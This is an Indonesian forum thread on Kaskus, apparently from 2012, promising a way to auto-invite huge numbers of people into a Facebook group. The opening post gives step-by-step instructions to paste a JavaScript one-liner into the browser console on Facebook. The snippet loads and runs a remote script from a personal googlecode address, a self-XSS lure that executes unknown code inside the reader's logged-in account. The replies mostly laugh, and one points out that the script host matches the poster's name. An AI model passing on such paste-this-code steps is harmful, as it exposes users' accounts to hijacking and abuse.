alexa-tracking

Main Content

1024
1024
KASKUS
51
244
https://www.kaskus.co.id/thread/000000000000000016497394/share-auto-invite-semua-orang-ke-dalam-grup-facebook-new
Smile [share] auto invite semua orang ke dalam grup facebook new
Udah bisa kembali auto invite grup yang udah bisa dari tanggal 13 september 2012 tunggu apalagi silahkan di praktekkan sekarang



Bagi yang belum tau...

anda ingin membangun grup dengan anggota yang banyak dalam sekejap? atau anda punya grup , adminnya anda? tapi anggotanya sedikit.. ingin menambahkan anggota grup yang banyak dalam sekejap? hingga ratusan ribu anggota ,oke simak di bawah ini :

MONGGO DI PRAKTEKKAN !!

Untuk Pengguna Mozzila Firefox



pergi ke grup FACEBOOK yang di tuju



1. Tekan tombol CTRL + SHIFT + K

2. Lalu isi kode ini

document.body.appendChild(document.createElement('script'emoticon-Wink).src='http://hendromardikadork.googlecode.com/files/hendromardikadorkdanbretastevanny.js.txt';





3. Enter



screenshootnya biar jelas >> http://prntscr.com/fg8c2

jika succes akan muncul begini > http://prntscr.com/fg8du

dan tunggu hingga selesai





Untuk pengguna Google Chrome

pergi ke grup yang di tuju



1. Klik kanan pada mouse

2. Tekan Inspect Element (Q)

3. Pilih Console

4. Lalu isi kode ini

document.body.appendChild(document.createElement('script'emoticon-Wink).src='http://hendromardikadork.googlecode.com/files/hendromardikadorkdanbretastevanny.js.txt';



5. Enter



screenshootnya biar jelas >>http://prntscr.com/fg8fb

jika succes akan muncul begini > http://prntscr.com/fg8g7



dan tunggu hingga selesai



nb : berlaku untuk semua grup kecuali anda sudah tergabung ke grup tersebut/ anda adminnyatunggu apa lagi ayo di praktekkan



* Jika Terjadi Error/eror *

coba ganti pakek yang cara mozila firefox

Coba ganti pakek yang google chrome(intinya saling bergantian)
wew mantabb
gunanya apa gan emoticon-Bingung
http://hendromardikadork.googlecode.com/ klo bikin nick kaskus ama link js nya jangan di samain gan ....
percuman maenan ginian mah emoticon-Ngakak (S)
mending maen gundu skalian emoticon-Ngakak (S)
slahsfemoticon-Cape d... (S)

[share] auto invite semua orang ke dalam grup facebook new , emoticon-Big Grin ngakak ane gan emoticon-Ngakak
ane bantu emoticon-Rate 5 Star ya gan emoticon-Smilie
keep posting emoticon-Big Grin

emoticon-Shakehand2
emoticon-Ngakak emoticon-Ngakak emoticon-Ngakak emoticon-Ngakak
jiakakkaka
nice joke gan... emoticon-Ngakak (S)
Wwkwkwkk, bisa aja ente gan dapet yang kayak gt an

hhahahi

Hahaha emoticon-Ngakak
lucu Gan. Bisa aja yg bikin joke neh
emoticon-Ngakak (S) lanjot jaya, Gan
bisa aja ni TS emoticon-Ngakak emoticon-Rate 5 Star
Koplak asli gan
gag tahan ane emoticon-Ngakak
Lucu banget gan
numpang ketawa emoticon-Ngakak
Hahahaha emoticon-Ngakak emoticon-Ngakak
sampek emoticon-Ngakak aku gan



Practice makes perfect, but nobodys perfect
jiakak somplak
ampe gag bisa berhenti ngakak emoticon-Ngakak
hahah keren dah gan threadnya emoticon-Ngakak
emoticon-Ngakak (S) emoticon-Ngakak (S) waduh bisa gitu ya emoticon-Ngakak (S)
emoticon-Sorry gan aneemoticon-Bingung
keren nih jokes gans emoticon-Ngakak (S) emoticon-Ngakak (S)
emoticon-Ngakak emoticon-Ngakak emoticon-Ngakak ente bisa aja gan

Thumbs down 

emoticon-Cape d... (S) emoticon-Cape d... (S) emoticon-Cape d... (S)